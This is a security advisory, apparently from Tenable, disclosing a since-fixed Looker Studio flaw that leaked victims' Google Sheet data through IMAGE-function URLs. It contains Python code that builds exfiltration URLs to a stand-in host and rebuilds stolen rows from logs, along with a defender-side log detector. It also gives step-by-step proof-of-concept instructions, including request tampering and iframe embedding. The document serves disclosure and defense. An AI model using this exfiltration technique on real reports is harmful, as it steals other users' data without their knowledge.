
Google Cloud Platform (GCP) Cross-Tenant Data Sources Leak With Image Rendering in Looker Studio

High

Synopsis

Tenable Research has identified and responsibly disclosed a vulnerability in Google's Looker Studio. The vulnerability allowed an attacker to leak sensitive data from a victim's data source through image rendering.

The attack chained several legitimate Looker Studio features. The attacker creates a report and attaches a data source they cannot read themselves, such as the victim's Google Sheet, configured to use "Viewer's credentials," so the sheet is queried with whichever Google account views the report rather than with the attacker's. The attacker then adds a calculated field to a table in the report whose formula calls the IMAGE function, with the image URL pointing at an attacker-controlled server and each row's cell values appended to that URL as a query string.

When the victim opens the report, Looker Studio queries the sheet with the victim's credentials, renders one image per table row, and the victim's browser requests each image from the attacker's server, carrying that row's data in the URL. The attacker logs these requests server-side and reconstructs the sheet row by row. A single click by the victim, on the shared report or on an attacker's web page that embeds it, is enough to trigger the leak.
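The following Python model of the exfiltration channel is an added example; it is not Tenable's proof-of-concept formula and not any Google or Looker Studio code. It shows the three pieces a practitioner needs to reason about: the image URL that a malicious calculated field produces for one row, the attacker-side recovery of rows from the image host's access log, and a defender-side check over proxy or web-server logs for the same pattern. The attacker host exfil.example, the path /pixel.gif, the query key c, the report id and the log lines are all hypothetical or constructed here and do not come from the advisory.

```python
"""Model of the IMAGE-function exfiltration channel described above.

Added example for illustration; this is not Tenable's proof-of-concept formula
and not any Google or Looker Studio code.  Hypothetical, not from the advisory:
the attacker host exfil.example, the image path /pixel.gif, the query key "c"
(repeated once per cell), and the sample log lines, which are constructed here
in the Apache/nginx "combined" format.
"""
import re
from urllib.parse import parse_qs, urlencode, urlsplit

ATTACKER_HOST = "exfil.example"  # hypothetical attacker-controlled domain
IMAGE_PATH = "/pixel.gif"        # hypothetical; any URL that IMAGE() will fetch
IMAGE_EXTS = (".gif", ".png", ".jpg", ".jpeg", ".webp", ".svg")

# One "combined" access-log line: ip ident user [ts] "req" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def build_exfil_url(row, host=ATTACKER_HOST):
    """The URL the malicious calculated field yields for one table row: an
    image on the attacker's host with every cell value URL-encoded into the
    query string.  Looker Studio wraps it in IMAGE(), so the viewer's browser
    fetches it and the viewer's own data travels in the request."""
    return f"https://{host}{IMAGE_PATH}?" + urlencode([("c", str(v)) for v in row])


def recover_rows(log_lines):
    """Attacker side: rebuild the victim's rows from the image host's access
    log.  Each GET for the pixel carries one row; cells come back in order
    because parse_qs keeps repeated keys in the order they appeared."""
    rows = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "GET":
            continue
        parts = urlsplit(m["target"])  # target may be a path or an absolute URL
        if parts.path != IMAGE_PATH:
            continue
        cells = parse_qs(parts.query, keep_blank_values=True).get("c")
        if cells:
            rows.append(tuple(cells))
    return rows


def flag_image_exfil(log_lines, max_query_len=40):
    """Defender side: over egress-proxy or web-server logs, flag image fetches
    referred from Looker Studio whose query string is far longer than a
    version tag or cache-buster would be.  The threshold is a tuning choice;
    the attacker's host is unknown in advance, so the referer and the query
    length are what a detection can key on.  Returns (client ip, image path,
    query length) per hit."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["target"])
        if not parts.path.lower().endswith(IMAGE_EXTS):
            continue
        if urlsplit(m["referer"]).hostname != "lookerstudio.google.com":
            continue
        if len(parts.query) > max_query_len:
            hits.append((m["ip"], parts.path, len(parts.query)))
    return hits


def log_line(ip, target, referer):
    """Constructed combined-format log line (sample data, not a real capture)."""
    return (f'{ip} - - [03/Sep/2025:10:00:00 +0000] "GET {target} HTTP/1.1" 200 43 '
            f'"{referer}" "Mozilla/5.0"')


# Constructed sample data standing in for the victim's sheet; the report id is a placeholder.
VICTIM_ROWS = [
    ("alice@example.com", "4111 1111 1111 1111", "Active"),
    ("bob@example.com", "5500 0000 0000 0004", "Closed"),
]
REPORT_URL = "https://lookerstudio.google.com/reporting/attacker-report-id"
SAMPLE_LOG = [log_line("203.0.113.5", build_exfil_url(r), REPORT_URL) for r in VICTIM_ROWS]
SAMPLE_LOG.append(log_line("203.0.113.5", "/assets/logo.png?v=3", REPORT_URL))  # benign fetch


if __name__ == "__main__":
    for row in recover_rows(SAMPLE_LOG):
        print("leaked row:", row)
    for hit in flag_image_exfil(SAMPLE_LOG):
        print("suspicious image fetch:", hit)
```

The request target is shown as the absolute URL an egress proxy would log; a web server's own access log carries only the path and query, which both parsers accept unchanged. The detection keys on the Looker Studio referer plus an unusually long query string because the attacker's host cannot be known in advance; the benign logo fetch with a short `?v=3` cache-buster is left alone.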

Proof of Concept:

Set up a mock data source, which is what the getColumns HTTP request will run against:

  1. Create a Google Sheet; in this walkthrough it is named "Attacker's spreadsheet."
  2. Populate every column from A to Z with random data so that getColumns returns a column for each letter.


Set up the attacker's report:

  1. Create a report.
  2. Choose a connector, for example Google Sheets.
  3. Choose the data source just created, "Attacker's spreadsheet."
  4. Uncheck "Use first row as headers" so that columns can be referenced by letter, A to Z.

Screenshot showing the report configuration

  5. Run the browser through an intercepting proxy and forward the requests as they come, including the getColumns request, which runs against the attacker's sheet.
  6. Intercept the createBlockDatasource and publishDatasource HTTP requests and change the sheet id in each from the attacker's sheet to the victim's sheet, so the published data source points at the victim's data while its column schema came from the attacker's sheet.
  7. Click Resource → Manage added data sources, edit the added Google Sheets data source, and change its credentials to Viewer's Credentials.

Screenshot showing the use of "Viewer's Credentials"

  8. Add a chart, preferably a table: press "Add a chart" and choose Table.
  9. Attach the victim's data source to the table. The chart should now show "No Data Set Access," since the attacker's own credentials cannot read the victim's sheet.
  10. Add a calculated field (select the table → "Add dimension" → "Add calculated field") and paste the formula attached to this report, replacing the placeholder with the attacker's domain.

Screenshot showing the entered formula


  11. Share the report with the victim, with the "Notify" checkbox unchecked.
  12. (Optional) Make the report embeddable: File → Embed report → check "Enable Embedding" → Done.
  13. (Optional) Host a website and embed the report in an iframe using the embed code Looker Studio provides once embedding is enabled, for example:

      <iframe width="600" height="450" src="https://lookerstudio.google.com/embed/reporting/<attacker's-report-id>/page/MK5LF" frameborder="0" style="border:0" allowfullscreen sandbox="allow-storage-access-by-user-activation allow-scripts allow-same-origin allow-popups allow-popups-to-escape-sandbox"></iframe>

  14. Visit the attacker's site (or open the shared report) as the victim; the victim's data is exfiltrated to the attacker's server.

Solution

Google has remediated the issue.

Disclosure Timeline

June 3, 2025 - Tenable reports the finding to Google; Google acknowledges
June 14, 2025 - Google assigns S1 severity
July 2, 2025 - Tenable asks for an update on the issue
July 15, 2025 - Tenable asks for an update
July 17, 2025 - Google reports that the product team is working to resolve the issue
July 28, 2025 - Google reports that the bug is fixed but not yet verified
July 31, 2025 - Tenable agrees to delay the disclosure date
August 2, 2025 - Google reports that the bug is fixed and verified
August 11, 2025 - Google reports that the fix is in production and asks to be told when Tenable discloses
August 28, 2025 - Google asks to see the TRA draft, and Tenable shares it
August 28, 2025 - Tenable delays publication to September 3 due to holidays

All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.

Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.

For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.

If you have questions or corrections about this advisory, please email [email protected]

Risk Information

Tenable Advisory ID: TRA-2025-30
Credit:
Liv Matan
Affected Products:
GCP Looker Studio
Risk Factor:
High

Advisory Timeline

September 3, 2025 - Initial release.